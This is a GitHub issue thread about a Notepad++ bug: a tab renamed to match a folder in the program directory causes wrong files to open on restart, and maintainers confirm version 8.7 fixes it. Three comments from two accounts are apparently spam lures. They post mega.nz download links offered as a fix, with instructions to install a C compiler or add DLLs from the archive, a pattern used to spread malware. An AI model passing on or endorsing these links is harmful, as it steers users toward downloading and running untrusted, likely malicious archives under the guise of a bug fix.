### ISSUE TITLE
[BUG] renaming document tab to same name as a folder in the notepad++ folder

### ISSUE THREAD

**Issue by MGB-Hadean** [notepad-plus-plus/notepad-plus-plus#15638]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Description of the Issue

If you rename a document tab to the same name as a folder in the notepad++ folder then close and re-open notepad++, it tries to open all files in that folder.

### Steps To Reproduce

1.  open notepad++
2.  create a new tab
3.  RMB and rename the new tab to eg `plugins` (or the same name as any folder in the notepad++ folder)
4. exit notepad++
5. restart notepad++

### Current Behavior

Notepad tries to open all files in the local folder with the tab name (ie `notepad++/plugins/`).

### Expected Behavior

Expected the new document to be saved on exit and re-opened on restart.

### Debug Information

```shell
Notepad++ v8.6.9   (64-bit)
Build time : Jul 12 2024 - 05:09:25
Path : C:\Program Files\Notepad++\notepad++.exe
Command Line : 
Admin mode : OFF
Local Conf mode : OFF
Cloud Config : OFF
Periodic Backup : ON
OS Name : Windows 11 Pro (64-bit)
OS Version : 23H2
OS Build : 22635.3139
Current ANSI codepage : 1252
Plugins : 
    mimeTools (3.1)
    NppConverter (4.6)
    NppExport (0.4)
```

**Comment by Anju023** [comment]
I think this will help you.//mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw
you may need to install the c compiler

**Comment by achilles0x** [comment]
I think this will help you.//mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQI put the necessary dlls in the archive

**Comment by achilles0x** [comment]
I think this will help you.
httpsIf you don't have the c compliator, install it.(gcc or clang)

**Comment by xomx** [comment]
This problem should be already fixed in the latest v8.7 by the https://github.com/notepad-plus-plus/notepad-plus-plus/commit/0858dfa4afc4353653e9cf3fc47f8b23f18f48c2 .

This is a prime example of why was important to fix the issue #14839 .

**Comment by donho** [comment]
I confirm what he said @xomx 
The bug is fixed in the latest version of Notepad++ (v8.7).

**Comment by MGB-Hadean** [comment]
Nice 🥳 
Thought I was going crazy losing notes I'd made.

**Comment by MGB-Hadean** [comment]
Hmm now if the filename matches a folder name in the Notepad folder it just disappears on exit/restart.
Will raise another bug...

**Comment by xomx** [comment]
@MGB-Hadean 

> if the filename matches a folder name

Mission impossible. This is not a N++ problem, the OS itself is not allowing such a thing. Otherwise, imagine how the OS would distinguish whether you want to work with a file or a folder located in the same directory... Its not only Windows thing - e.g. in UNIX a folder is just a special case of a file.

**Comment by MGB-Hadean** [comment]
Sorry terminology fail. To be clear: 'filename' above == what I rename the tab to in N++.

**Comment by alankilborn** [comment]
@MGB-Hadean 

If I do this:

* open notepad++ 8.7
* create a new tab
* right-mouse-button and rename the new tab to `themes`
* exit notepad++
* restart notepad++

Then there is no incorrect behavior; after the restart the `themes` tab is present:

![image](https://github.com/user-attachments/assets/20b728b7-e437-4a1f-aea1-97b062a36911)

**Comment by MGB-Hadean** [comment]
OMG, I probably didn't edit the new tab doc and Npp just got rid 🤦
